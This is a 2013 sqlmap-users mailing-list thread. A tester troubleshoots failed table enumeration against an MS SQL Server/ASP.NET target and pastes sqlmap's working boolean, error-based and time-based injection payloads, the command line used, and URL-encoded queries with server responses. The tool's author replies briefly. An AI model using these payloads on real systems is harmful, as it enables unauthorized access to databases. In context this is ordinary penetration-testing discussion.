Hi.
Maybe web server has a treshold value for a parameter value length. This
looks like such case.
Kind regards,
Miroslav Stampar
Dana 22.2.2013. 02:23 "Brian Milliron" <br...@ecrsecurity.com> je
napisao/la:
> SQlmap is able to extract db names, current user and backend info, but
> when I try to get tables I end up with junk data or nothing at all. I
> find this strange because SQLmap has identified multiple injection
> methods and I am on a fast local connection with the target server.
> This is the log file with examples of good/bad data.
>
> sqlmap identified the following injection points with a total of 118915
> HTTP(s) requests:
> ---
> Place: POST
> Parameter: accountNumber
> Type: boolean-based blind
> Title: Generic boolean-based blind - Parameter replace (original
> value)
> Payload: accountNumber=(SELECT (CASE WHEN (4906=4906) THEN 1111111
> ELSE 1/(SELECT 0)
> END))&meterNumber=1111111&zipCode=78451&email=t...@test.com
> ®ister=Register
>
> Type: error-based
> Title: Microsoft SQL Server/Sybase error-based - Parameter replace
> Payload:
>
> accountNumber=(CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR(100)+CHAR(58)+(SELECT
> (CASE WHEN (3149=3149) THEN CHAR(49) ELSE CHAR(48)
>
> END))+CHAR(58)+CHAR(100)+CHAR(111)+CHAR(103)+CHAR(58))))&meterNumber=1111111&zipCode=78451&email=
> t...@test.com®ister=Register
>
> Type: AND/OR time-based blind
> Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
> Payload: accountNumber=-9196 OR 8333=(SELECT COUNT(*) FROM sysusers
> AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS
> sys5,sysusers AS sys6,sysusers AS
> sys7)&meterNumber=1111111&zipCode=78451&email=t...@test.com
> ®ister=Register
> ---
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0
> back-end DBMS: Microsoft SQL Server 2008
> available databases [21]:
> [redacted]
> current user: [redacted]
> current database: [redacted]
> current user is DBA: False
>
> [6 tables]
>
> +------------------------------------------------------------------------------------------------------------------------
> | dbo.[??4c0?4A00370?520?22??2d0040005a??00??2A??58??5f0?0d00000?3c??2
> |
> |dbo.[\n\n]
> |
> |dbo.[\n\n]
> |
> dbo.[\n\n]
>
> dbo.[\n\n]
>
> +------------------------------------------------------------------------------------------------------------------------
>
> When I use --no-cast and --hex flags I get no data at all and when I
> don't use them I get junk data. When I look at the raw request/response
> in every case I see sqlmap send a test request with no injection which
> generates a 200 response, then follows an attempt to read the number of
> tables which generates a 500 error with a number in the error message.
> Every follow on request generates a 200 OK response, which means that
> neither boolean nor error based methods are working and it falls back to
> time based which then also fails. Of all the correct data gathered so
> far, all was through error messages. However, specifying --technique=E
> --parse-errors does not gain any additional info. Some selected
> examples from the logs related to this attempt follow:
>
>
> ./sqlmap.py -r /root/request --fresh-queries -o --hex --no-cast -D
> master --tables -t ~/sqlmap
>
> [WARNING] it was not possible to count the number of entries for the SQL
> query provided. sqlmap will assume that it returns only one entry
> [WARNING] in case of continuous data retrieval problems you are advised
> to try a switch '--no-cast' and/or switch '--hex'
> [CRITICAL] unable to retrieve the tables for any database
> [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 18 times
>
>
> %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master..
> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
>
> HTTP response [#2] (500 Internal Server Error):
> [Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when
> converting the nvarchar value ':omd:0x00000167:dog:' to data type int.
>
>
> %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28master.sys.fn_varbintohexstr%28CAST%28master..
> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %20AS%20VARBINARY%28MAX%29%29%29%29%2C1%2C100%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20AND%20master.sys.fn_varbintohexstr%28CAST%28master..
> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %20AS%20VARBINARY%28MAX%29%29%29%20NOT%20IN%20%28SELECT%20TOP%200%20master.sys.fn_varbintohexstr%28CAST%28master..
> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20ORDE
> R%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..
> sysobjects.name
> %29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
>
> HTTP response [#3] (200 OK):
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_feb
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
------------------------------------------------------------------------------
Everyone hates slow websites. So do we.
Make your web apps faster with AppDynamics
Download AppDynamics Lite for free today:
http://p.sf.net/sfu/appdyn_d2d_feb
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
